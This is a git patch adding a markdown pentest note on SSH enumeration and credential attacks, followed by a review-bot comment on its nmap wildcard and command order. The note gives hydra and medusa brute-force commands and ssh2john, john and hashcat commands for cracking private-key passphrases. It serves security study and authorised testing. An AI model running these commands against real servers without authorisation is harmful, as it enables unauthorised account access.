From b4b755b608ab215927d0c6b374bd24ba3d334b41 Mon Sep 17 00:00:00 2001 From: Hadi Date: Mon, 4 May 2026 14:15:59 +0200 Subject: [PATCH] Init ssh Signed-off-by: Hadi --- src/content/notes/network/ssh.md | 75 ++++++++++++++++++++++++++++++++ 1 file changed, 75 insertions(+) create mode 100644 src/content/notes/network/ssh.md diff --git a/src/content/notes/network/ssh.md b/src/content/notes/network/ssh.md new file mode 100644 index 0000000..96e7d50 --- /dev/null +++ b/src/content/notes/network/ssh.md @@ -0,0 +1,75 @@ +--- +title: "SSH" +description: "Enumeration, exploitation and post-exploitation techniques for SSH servers." +tags: ["ssh", "network", "service"] +publishDate: 2026-05-04 +--- + +## Overview + +SSH runs on **port 22** and provides an encrypted remote shell. +Common implementations: OpenSSH, Dropbear, Bitvise. + +## Enumeration + +### Banner grabbing + +```bash +nc -nv $IP 22 +ssh $IP +``` + +The banner reveals the software and version (e.g. `OpenSSH_9.2`). + +### Nmap + +```bash +nmap -sV -p 22 $IP +nmap -p 22 --script ssh-* $IP +``` + +Key scripts: + +- `ssh-hostkey`: retrieves the server's public key +- `ssh-auth-methods`: lists accepted authentication methods +- `ssh-brute`: brute-force credentials + +## Connect + +```bash +ssh $user@$IP +ssh -p 2222 $user@$IP +ssh -i id_rsa $user@$IP +``` + +## Brute Force + +```bash +hydra -l $user -P ~/wordlists/rockyou.txt ssh://$IP +medusa -h $IP -u $user -P ~/wordlists/rockyou.txt -M ssh +``` + +Only viable if password auth is enabled. Check with: + +```bash +ssh -v $user@$IP +``` + +Look for `publickey,password` in the output. + +## Key-Based Auth + +If you find a private key (`id_rsa`), set permissions and connect: + +```bash +chmod 600 id_rsa +ssh -i id_rsa $user@$IP +``` + +If the key is encrypted, crack the passphrase: + +```bash +ssh2john id_rsa > hash.txt +john hash.txt --wordlist=~/wordlists/rockyou.txt +hashcat -m 22921 hash.txt ~/wordlists/rockyou.txt +```
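Review bot: In the Nmap block under "Enumeration", `nmap -p 22 --script ssh-* $IP` has two problems. The pattern is unquoted, so the shell may expand `ssh-*` against files in the current directory before nmap sees it. The wildcard also selects `ssh-brute`, which the "Key scripts" list in this same file describes as brute-forcing credentials, so a command filed under enumeration also sends login attempts to the server. Suggest naming the scripts explicitly, e.g. `--script ssh-hostkey,ssh-auth-methods`, or at least quoting the pattern as `--script "ssh-*"` and stating in the text that it includes `ssh-brute`. Separately, in "Brute Force" the `ssh -v $user@$IP` check for whether password auth is enabled comes after the hydra and medusa commands; moving the check above them would match the order the prose implies ("Only viable if password auth is enabled").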